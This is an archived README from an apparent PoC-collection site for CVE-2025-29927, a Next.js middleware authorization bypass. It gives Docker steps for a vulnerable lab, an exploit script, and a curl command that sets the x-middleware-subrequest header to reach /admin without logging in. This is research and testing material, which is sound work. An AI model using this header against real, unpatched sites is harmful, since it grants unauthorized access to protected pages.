关联漏洞
描述
Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.
介绍
# Next.js Middleware Vulnerability Research (CVE-2025-29927)
This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache-poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, allowing attackers to bypass middleware protection mechanisms.
This proof of concept is specific for the vulnerability in **v12**
## Usage
### Environment setup
Set up the vulnerable environment using docker and the files from this repo by running:
```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```
### Exploit
This repository has the `exploit.sh` already created script to test the explotation of the vulnerability. Tu test it run:
```bash
chmod +x exploit.sh
./exploit.sh
```
Additionally you can test the explotation of the vulnerability by trying the following
1. Request the admin page without authentication. You should get a redirection to the `login` page.
```bash
curl -i http://localhost:3000/admin
```
2. Request the page without authentication but using the `x-middleware-subrequest` header. You should be able to bypass the authentication page.
```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```
## Security Advisory
- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)
文件快照
[4.0K] /data/pocs/03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1
├── [ 365] Dockerfile
├── [ 665] exploit.sh
├── [ 46] next.config.js
├── [ 242] package.json
├── [4.0K] pages
│ ├── [ 369] about.js
│ ├── [ 157] admin.js
│ ├── [ 375] index.js
│ ├── [ 550] login.js
│ └── [1.3K] _middleware.js
├── [1.6K] README.md
└── [4.0K] styles
└── [ 119] global.css
2 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。